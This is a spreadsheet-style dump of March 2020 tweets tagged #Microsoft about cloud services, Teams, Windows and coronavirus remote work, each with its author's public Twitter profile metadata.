    <t>{'id': 63421268, 'id_str': '63421268', 'name': 'Sandeep Pareek', 'screen_name': 'Sandeep186', 'location': 'Chennai', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 159, 'friends_count': 128, 'listed_count': 0, 'created_at': 'Thu Aug 06 08:46:38 +0000 2009', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 183,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'http://pbs.twimg.com/profile_images/1204405728896679938/dBETJPcv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1204405728896679938/dBETJPcv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/63421268/1575899786',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</si>
  <si>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15:06:52 +0000 2020</t>
  </si>
  <si>
    <t>The #PowerOf3 allows maximisation of #SAP on the #cloud, says @vinzenzkremer, Global MD for @Accenture. #Microsoft #Azure https://t.co/LvLyqkf6Re</t>
  </si>
  <si>
    <t>Thu Mar 05 15:04:43 +0000 2020</t>
  </si>
  <si>
    <t>Which one??
.
#nokia #nokiafanclub #android #lumia #windows #microsoft #lumia930 #beauty #lumia1020 #nokia808 #nokia808pureview #camera https://t.co/o9bmMmRsHu</t>
  </si>
  <si>
    <t>{'id': 1053322739090485248, 'id_str': '1053322739090485248', 'name': 'Nokiafanclub', 'screen_name': 'nokiafanclub__', 'location': '', 'description': "Official Nokiafanclub Twitter Account. \nLet's Get Together For The All new NokiaðŸ’ª\n#unitefornokia", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 31, 'friends_count': 87, 'listed_count': 1, 'created_at': 'Fri Oct 19 16:31:25 +0000 2018', 'favourites_count': 408, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1053323787968466944/JF4ympSp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1053323787968466944/JF4ympSp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1053322739090485248/1582967067',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</si>
  <si>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15:03:15 +0000 2020</t>
  </si>
  <si>
    <t>@rrelyea What about the people who aren't fortunate enough 2 work from home? Of course big business like #Microsoft #Amazon #facebook want their employees safe. In the meantime y not offer up the buildings &amp;amp; Amazon warehouses 4 quarantine instead of the disenfranchised #whitecenter?  https://t.co/zbsLwR05KQ</t>
  </si>
  <si>
    <t>{'id': 1233514172488540161, 'id_str': '1233514172488540161', 'name': 'Billie Oldish', 'screen_name': 'BillieOldish', 'location': 'White Center corogrounds', 'description': "We're all doomed â˜¹ï¸ðŸ–¤", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 7, 'listed_count': 0, 'created_at': 'Fri Feb 28 22:08:43 +0000 2020', 'favourites_count': 184,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'http://pbs.twimg.com/profile_images/1233555148581961728/St-xkEUg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233555148581961728/St-xkEUg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1233514172488540161/1583216104',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</si>
  <si>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15:02:09 +0000 2020</t>
  </si>
  <si>
    <t>How is your broom closet more secure than a server room with bank-level security? The short answer is: you need to upgrade your IT infrastructure and ShireWire Global Sales &amp;amp;amp; Distribution LLC and #Microsoft can help. https://t.co/B2Ftg40PtC</t>
  </si>
  <si>
    <t>{'id': 1199726410098708481, 'id_str': '1199726410098708481', 'name': 'ShireWire Global Sales &amp; Distribution LLC', 'screen_name': 'ShirewireGSD', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 114, 'listed_count': 0, 'created_at': 'Wed Nov 27 16:27:38 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 260, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1199738351722606593/nGbdIxUq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1199738351722606593/nGbdIxUq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1199726410098708481/1574874964',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</si>
  <si>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15:01:23 +0000 2020</t>
  </si>
  <si>
    <t>Select Region: Want to select a block of cells in one go.  Press Ctrl+* (or Ctrl+Shift+8).  Don't forget that many commands like sorting or creating a table don't need the region to be highlighted first #Excel #Microsoft</t>
  </si>
  <si>
    <t>{'id': 91387358, 'id_str': '91387358', 'name': 'Quick Excel Tips', 'screen_name': 'blackswantrain', 'location': 'Hampshire', 'description': 'Quick Excel tips - making you better at number crunching, data processing, pivot tables, charts and all things Excel and Microsoft Office.', 'url': 'http://t.co/zMvd6F2WpZ', 'entities': {'url': {'urls': [{'url': 'http://t.co/zMvd6F2WpZ', 'expanded_url': 'http://blackswantraining.co.uk', 'display_url': 'blackswantraining.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1208, 'friends_count': 152, 'listed_count': 53, 'created_at': 'Fri Nov 20 17:39:39 +0000 2009', 'favourites_count': 122, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1081,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'http://pbs.twimg.com/profile_images/1044503526/Black_Swan_Square_Logo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1044503526/Black_Swan_Square_Logo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/91387358/1547024566', 'profile_link_color': '2E2E2E', 'profile_sidebar_border_color': 'CED1D2', 'profile_sidebar_fill_color': 'F4F4F4', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 15:00:55 +0000 2020</t>
  </si>
  <si>
    <t>@PawlowskiMario @mashable @MargaretSiegien @WorldTrendsInfo @enricomolinari @mvollmer1 @alison_iot @kuriharan @MikeQuindazzi That #AugmentedReality headset is child's play compared to the #Microsoft #Hololens!</t>
  </si>
  <si>
    <t>{'id': 215478538, 'id_str': '215478538', 'name': 'A World of #Science, #Tech, and #Space', 'screen_name': 'worldofscitech', 'location': 'The 10th Dimension', 'description': 'Your Source for Interesting News about #Science, #Technology, #Computing, #Robotics, #Space, #AI, and the #Future... from the Best Sources Around the Galaxy!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 20371, 'friends_count': 1994, 'listed_count': 735, 'created_at': 'Sun Nov 14 01:53:37 +0000 2010', 'favourites_count': 4394, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3213,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'http://pbs.twimg.com/profile_images/1209882952504610817/EDICkiqU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1209882952504610817/EDICkiqU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/215478538/1577294034', 'profile_link_color': 'FF691F',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</si>
  <si>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15:00:49 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> New Podcast! "Podcast Ep 3 Discovery" on @Spreaker #amazon #amlaw100 #aws #bigdata #capaxdiscovery #cloud #cloudcomputing #dataarchiving #datasolutions #discovery #eas #ediscovery #it #legal #microsoft #office365 #tech #toplegalfirms #uga https://t.co/GusdnGuz2B</t>
  </si>
  <si>
    <t>{'id': 1107632065640570880, 'id_str': '1107632065640570880', 'name': 'Unified Global Archiving', 'screen_name': 'UGA_Premcloud', 'location': 'Williamsville, NY ', 'description': 'Our mission at Unified Global Archiving is unequivocal:  We provide comprehensive unified data archive solutions and services for our enterprise customers.', 'url': 'https://t.co/jBhjIN6Plx', 'entities': {'url': {'urls': [{'url': 'https://t.co/jBhjIN6Plx', 'expanded_url': 'https://www.unifiedglobalarchiving.org/', 'display_url': 'unifiedglobalarchiving.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 27, 'listed_count': 0, 'created_at': 'Mon Mar 18 13:17:18 +0000 2019', 'favourites_count': 10,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'http://pbs.twimg.com/profile_images/1229787274243661824/23shz49R_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229787274243661824/23shz49R_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1107632065640570880/1582039272',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</si>
  <si>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15:00:05 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and the NFL expand partnership to accelerate digital transformation across the League #surface #teams #microsoft365 https://t.co/X3kg2Q8CKz</t>
  </si>
  <si>
    <t>{'id': 32630040, 'id_str': '32630040', 'name': 'Martin ten Voorde', 'screen_name': 'martintenvoorde', 'location': 'Amsterdam', 'description': 'passionate athlete, innovator, social, service, marketing, sales, responsible microsoft, digital transformation, azure, office 365 &amp; dynamics 365 crm erp', 'url': 'https://t.co/bXzd7gGTIv', 'entities': {'url': {'urls': [{'url': 'https://t.co/bXzd7gGTIv', 'expanded_url': 'https://www.microsoft.com/en-us/', 'display_url': 'microsoft.com/en-us/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 10333, 'friends_count': 11347, 'listed_count': 375, 'created_at': 'Fri Apr 17 22:32:42 +0000 2009', 'favourites_count': 641, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 16278,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'http://pbs.twimg.com/profile_images/1882396335/MTV_normal.PNG', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1882396335/MTV_normal.PNG', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/32630040/1501622642',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</si>
  <si>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14:59:59 +0000 2020</t>
  </si>
  <si>
    <t>Due to the ongoing #coronavirus outbreak, #Google and #Microsoft are giving away enterprise conferencing tools to make it easier for people to work from home. https://t.co/D62hToVCuD</t>
  </si>
  <si>
    <t>{'id': 459295507, 'id_str': '459295507', 'name': 'Restech', 'screen_name': 'RestechInfo', 'location': 'New Orleans', 'description': 'Restech is a full suite IT &amp; Cybersecurity firm for businesses.', 'url': 'http://t.co/fWBWUtgIgI', 'entities': {'url': {'urls': [{'url': 'http://t.co/fWBWUtgIgI', 'expanded_url': 'http://www.restech.net', 'display_url': 'restech.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 80, 'friends_count': 118, 'listed_count': 9, 'created_at': 'Mon Jan 09 14:11:03 +0000 2012', 'favourites_count': 71, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1053,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'http://pbs.twimg.com/profile_images/1994371656/Restech_R_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1994371656/Restech_R_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/459295507/1487950757',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</si>
  <si>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14:59:36 +0000 2020</t>
  </si>
  <si>
    <t>A #phishing campaign used #Microsoft's #OneNote to bypass detection tools and download malware onto victims systems.  #malware #CyberSecurity https://t.co/SsSRMtBona</t>
  </si>
  <si>
    <t>{'id': 1044572906917900288, 'id_str': '1044572906917900288', 'name': 'PlexxTech Solutions', 'screen_name': 'PlexxtechS', 'location': '325 Healey Road Bolton, ON ', 'description': '#ManagedServices #ITSolutions #Outsourcing #Tech #DataProtection #Monitoring #business #SMB #msp  We serve the #GTA and surrounding area. Call us 416-874-0550', 'url': 'https://t.co/H235eWb5Xh', 'entities': {'url': {'urls': [{'url': 'https://t.co/H235eWb5Xh', 'expanded_url': 'http://www.plexxtech.com', 'display_url': 'plexxtech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 69, 'friends_count': 256, 'listed_count': 0, 'created_at': 'Tue Sep 25 13:02:43 +0000 2018', 'favourites_count': 780, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 642,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'http://pbs.twimg.com/profile_images/1146478611886686208/szzRfX0T_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1146478611886686208/szzRfX0T_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1044572906917900288/1579285373',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</si>
  <si>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14:59:20 +0000 2020</t>
  </si>
  <si>
    <t>Have #Sage300 and #PowerBI --&amp;gt; Watch this quick video and then go get the analytics #FREE on #Microsoft #AppSource! https://t.co/RrbLSBKmWi</t>
  </si>
  <si>
    <t>{'id': 14995205, 'id_str': '14995205', 'name': 'Trey Johnson', 'screen_name': 'treyjohnson', 'location': 'Jacksonville, FL', 'description': 'Chief Evangelist &amp; Leader at ZAP (https://t.co/MYxIkFTNck) | Long-Time BI/DW/Data Mgmt Practitioner | #TalkDataToMe | #DataFam | #SQLFamily', 'url': 'https://t.co/mmtEFcEd3l', 'entities': {'url': {'urls': [{'url': 'https://t.co/mmtEFcEd3l', 'expanded_url': 'https://www.zapbi.com', 'display_url': 'zapbi.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/MYxIkFTNck', 'expanded_url': 'http://zapbi.com', 'display_url': 'zapbi.com', 'indices': [34, 57]}]}}, 'protected': False, 'followers_count': 241, 'friends_count': 348, 'listed_count': 8, 'created_at': 'Tue Jun 03 17:42:38 +0000 2008', 'favourites_count': 489, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1025,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'http://pbs.twimg.com/profile_images/1009095232707858433/PTuOk5UP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1009095232707858433/PTuOk5UP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14995205/1519149029',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</si>
  <si>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14:59:11 +0000 2020</t>
  </si>
  <si>
    <t>#Apple, #Microsoft, #Google look to move production away from #China.$AAPL $MSFT $GOOGL - https://t.co/1JyXasiffv</t>
  </si>
  <si>
    <t>{'id': 23954327, 'id_str': '23954327', 'name': 'Hotpage News', 'screen_name': 'Hotpage_News', 'location': 'United States', 'description': 'Top 50 Headlines of the Day', 'url': 'http://t.co/tBHEZ1PaKD', 'entities': {'url': {'urls': [{'url': 'http://t.co/tBHEZ1PaKD', 'expanded_url': 'http://www.hotpagenews.com', 'display_url': 'hotpagenews.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 27155, 'friends_count': 13661, 'listed_count': 571, 'created_at': 'Thu Mar 12 14:16:30 +0000 2009', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 282459,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'http://pbs.twimg.com/profile_images/513815303906545664/t8BNuo1P_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/513815303906545664/t8BNuo1P_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23954327/1458591160',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</si>
  <si>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14:58:56 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft OneDrive has become one of the most useful tools in the Office 365 suite.  Why should consider it for your organization in this week's blog. #microsoft #onedrive #cloudsolutions https://t.co/MhICvEeE3m</t>
  </si>
  <si>
    <t>{'id': 236490727, 'id_str': '236490727', 'name': 'Zunesis, Inc.', 'screen_name': 'Zunesis', 'location': 'Denver, CO, Las Vegas, NV', 'description': 'We make your tech better and help you understand how to use it best. Hybrid IT | Compute - Network - Storage', 'url': 'http://t.co/6a3EkHm3Ra', 'entities': {'url': {'urls': [{'url': 'http://t.co/6a3EkHm3Ra', 'expanded_url': 'http://www.zunesis.com', 'display_url': 'zunesis.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 916, 'friends_count': 1058, 'listed_count': 63, 'created_at': 'Mon Jan 10 18:19:34 +0000 2011', 'favourites_count': 2825, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2727,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'http://pbs.twimg.com/profile_images/1179034728067813376/_XVwVolw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1179034728067813376/_XVwVolw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/236490727/1428620003',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</si>
  <si>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14:55:12 +0000 2020</t>
  </si>
  <si>
    <t>New Microsoft Security Nightmare: Users Warned Your Passwords Are Now At Risk https://t.co/Inaks1jRKU #technews #technology #microsoft #security</t>
  </si>
  <si>
    <t>{'id': 16436186, 'id_str': '16436186', 'name': 'Karl Kovacs', 'screen_name': 'karlkovacs', 'location': 'Gabriola Island', 'description': 'Dog Walker ðŸ‘£ Tech Consultant ðŸ‘£ Photographer ðŸ‘£ Social Media Marketing ðŸ‘£ Writer / Editor', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 9064, 'friends_count': 4191, 'listed_count': 485, 'created_at': 'Wed Sep 24 15:59:21 +0000 2008', 'favourites_count': 12365, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 51903,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'http://pbs.twimg.com/profile_images/1128139742619549696/ssnhDjm0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1128139742619549696/ssnhDjm0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16436186/1571331110', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FBFDFD', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 14:54:41 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, #Amazon and other tech firms urge employees to work from home to slow spread of #coronavirus $AAPL #GOOGL $FB $AMZN - https://t.co/FuNm8F0dKu</t>
  </si>
  <si>
    <t>Thu Mar 05 14:50:40 +0000 2020</t>
  </si>
  <si>
    <t>Shortcut Shift + Delete doesn't instantly erase the file from the PC though it shows deleted. So, to delete data securely there are tools that you can use.
#Howto #Microsoft #Windows https://t.co/i9C7rJc62J https://t.co/cX8T0hJu7t</t>
  </si>
  <si>
    <t>{'id': 1141750046452359168, 'id_str': '1141750046452359168', 'name': 'Whoop to us', 'screen_name': 'UsWhoop', 'location': '', 'description': 'Whoop To Us is an ambitious Tech News effort to offer information about the latest technology. Weâ€™re a one-stop-info provider for some serious technologies.', 'url': 'https://t.co/S76hwTtMZq', 'entities': {'url': {'urls': [{'url': 'https://t.co/S76hwTtMZq', 'expanded_url': 'https://whooptous.com', 'display_url': 'whooptous.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 116, 'friends_count': 156, 'listed_count': 0, 'created_at': 'Thu Jun 20 16:49:58 +0000 2019', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 771,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'http://pbs.twimg.com/profile_images/1147372529222209536/gaWY0Qzd_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1147372529222209536/gaWY0Qzd_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1141750046452359168/1562390240',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</si>
  <si>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14:46:39 +0000 2020</t>
  </si>
  <si>
    <t>Streamline the process of bringing everyone together in your small to medium-sized #business. With #MicrosoftTeams there's something new for everyone!
#microsoft #informationtechnology #collaboration #exquitech https://t.co/ehs74MIWy3</t>
  </si>
  <si>
    <t>{'id': 1228940917899431938, 'id_str': '1228940917899431938', 'name': 'Exquitech (Microsoft Gold Cloud Partner)', 'screen_name': 'ExquitechDMCC', 'location': 'Dubai,United Arab Emirates ', 'description': 'Our mission is to deliver the best IT practices while applying continuous innovation and automated solutions.', 'url': 'https://t.co/lwGugyNsUL', 'entities': {'url': {'urls': [{'url': 'https://t.co/lwGugyNsUL', 'expanded_url': 'http://www.exquitech.com/', 'display_url': 'exquitech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 18, 'friends_count': 33, 'listed_count': 0, 'created_at': 'Sun Feb 16 07:16:58 +0000 2020', 'favourites_count': 5,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'http://pbs.twimg.com/profile_images/1229036857561886722/FGhpNuz5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229036857561886722/FGhpNuz5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1228940917899431938/1581838083',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</si>
  <si>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14:46:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is exploring the idea of using a transparent background and the new Fluent-based icons to "visually unify the start menu from somewhat chaotic color to something that is more uniform. #Windows10 
https://t.co/D5TPwxj2wz</t>
  </si>
  <si>
    <t>{'id': 1136920622943133696, 'id_str': '1136920622943133696', 'name': 'Luca ðŸ‡ºðŸ‡¸ðŸ‡®ðŸ‡±ðŸ‡®ðŸ‡¹', 'screen_name': 'Luca_Quant', 'location': 'Manhattan, NY', 'description': 'FX Derivatives Lead Quant Engineer working and living in Manhattan. Specialties: Quant Finance, C++, C#, Java, Maths and Python', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 31, 'friends_count': 148, 'listed_count': 0, 'created_at': 'Fri Jun 07 08:59:34 +0000 2019', 'favourites_count': 1146, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 724, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1212652870501380097/uPe7pjK-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212652870501380097/uPe7pjK-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1136920622943133696/1559900873',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</si>
  <si>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14:45:41 +0000 2020</t>
  </si>
  <si>
    <t>Why no Visio?!?! #GoogleDrive #Microsoft @thurrott https://t.co/icsI3VZpql</t>
  </si>
  <si>
    <t>{'id': 21442288, 'id_str': '21442288', 'name': 'C:\\raig\\Gjerdingen', 'screen_name': 'cgjerdingen', 'location': '', 'description': "Probably best if you don't read this; it's not for you.\nTwitter is just my anger bucket at present.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 232, 'friends_count': 661, 'listed_count': 27, 'created_at': 'Fri Feb 20 22:38:11 +0000 2009', 'favourites_count': 3769, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3034,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'http://pbs.twimg.com/profile_images/3120618348/3e72a3efd495bbb29aa097c8b8b847aa_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3120618348/3e72a3efd495bbb29aa097c8b8b847aa_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/21442288/1432003322',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</si>
  <si>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14:45:17 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft recently revealed the updates to Windows 10, and its certainly a massive upgrade.
Learn more: https://t.co/UcvQlxGOTe https://t.co/IIj3VZ9no4</t>
  </si>
  <si>
    <t>{'id': 759432374, 'id_str': '759432374', 'name': 'Timlin Enterprises', 'screen_name': 'TimlinEnt', 'location': 'Marlborough, MA', 'description': 'Timlin Enterprises is an information technology services provider focused solely on the #Office365 platform.', 'url': 'http://t.co/rBihvgktzj', 'entities': {'url': {'urls': [{'url': 'http://t.co/rBihvgktzj', 'expanded_url': 'http://www.timlinenterprises.com/', 'display_url': 'timlinenterprises.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 605, 'friends_count': 1718, 'listed_count': 109, 'created_at': 'Wed Aug 15 14:03:52 +0000 2012', 'favourites_count': 232, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1583,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'http://pbs.twimg.com/profile_images/1019244804532682752/wtsWoS4P_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1019244804532682752/wtsWoS4P_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/759432374/1550093025',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</si>
  <si>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14:43:57 +0000 2020</t>
  </si>
  <si>
    <t>Take your business further with Microsoft 365. To learn more about @iLink's competitive advantage here
https://t.co/VNy6E24oKo #ilinkdigital #ilinkdifference #microsoft365 #Office365 #O365 #cloud #licensing #azure #microsoft #costsaving https://t.co/0xU3qORJOs</t>
  </si>
  <si>
    <t>{'id': 1215732788688650240, 'id_str': '1215732788688650240', 'name': 'iLink Digital', 'screen_name': 'ilinkdigital', 'location': 'Bothell, WA', 'description': 'A Global Digital Transformation Consulting Company serving over 250 customers across diverse industries.', 'url': 'https://t.co/Dn4lxQal2b', 'entities': {'url': {'urls': [{'url': 'https://t.co/Dn4lxQal2b', 'expanded_url': 'http://www.ilink-digital.com', 'display_url': 'ilink-digital.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 28, 'listed_count': 0, 'created_at': 'Fri Jan 10 20:31:20 +0000 2020', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 105, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1217220189722300417/WLFUREhR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217220189722300417/WLFUREhR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1215732788688650240/1579042884',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</si>
  <si>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14:42:13 +0000 2020</t>
  </si>
  <si>
    <t>@JWVerret @GeorgeMasonU The adoption of programs such as #webex or #microsoft teams is a great solution and we can help ensure sustained adoption! #MMITC</t>
  </si>
  <si>
    <t>{'id': 1969105687, 'id_str': '1969105687', 'name': 'Meet Me In The Cloud', 'screen_name': 'Meetmeincloud', 'location': 'California, USA', 'description': 'A global leader in collaboration adoption services helping organizations successfully implement cloud-based services and achieve desired business outcomes.', 'url': 'https://t.co/23CBCHsclP', 'entities': {'url': {'urls': [{'url': 'https://t.co/23CBCHsclP', 'expanded_url': 'https://meetmeinthecloud.com', 'display_url': 'meetmeinthecloud.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 81, 'friends_count': 55, 'listed_count': 4, 'created_at': 'Fri Oct 18 15:24:46 +0000 2013', 'favourites_count': 977, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 318,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'http://pbs.twimg.com/profile_images/378800000614124088/09d63e082e1169d28358337631baf46d_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000614124088/09d63e082e1169d28358337631baf46d_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1969105687/1569355560',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</si>
  <si>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14:42:07 +0000 2020</t>
  </si>
  <si>
    <t>Take your business further with Microsoft 365. To learn more about @iLink's competitive advantage here
https://t.co/JlIo2MP334 #ilinksystems #ilinkdifference #microsoft365 #Office365 #O365 #cloud #licensing #azure #microsoft #costsaving https://t.co/BmtHpAaklb</t>
  </si>
  <si>
    <t>{'id': 19404418, 'id_str': '19404418', 'name': 'iLink Systems', 'screen_name': 'iLinkSystems', 'location': 'Bothell, WA', 'description': 'iLink Systems is a one stop shop for all your technology needs around #Cloud (#Azure, AWS, O365), Data Mgmt(BI, #BigData, MDM), Social, MEAN Stack, Mobile &amp; UX.', 'url': 'http://t.co/V4wT5GX7ia', 'entities': {'url': {'urls': [{'url': 'http://t.co/V4wT5GX7ia', 'expanded_url': 'http://www.ilink-systems.com', 'display_url': 'ilink-systems.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 404, 'friends_count': 387, 'listed_count': 73, 'created_at': 'Fri Jan 23 17:44:36 +0000 2009', 'favourites_count': 143, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1752, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'DDDEE6', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/839606542500405248/wFYK7Gyf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/839606542500405248/wFYK7Gyf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19404418/1505128963', 'profile_link_color': 'C14F3A',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</si>
  <si>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14:41:00 +0000 2020</t>
  </si>
  <si>
    <t>#EY, #Microsoft and #ConsenSys unveiled the #Baseline Protocol. The aim is to empower enterprises to adopt the public Ethereum #blockchain for complex and confidential processes, without storing sensitive data on-chain. https://t.co/WmzTzgLxFN</t>
  </si>
  <si>
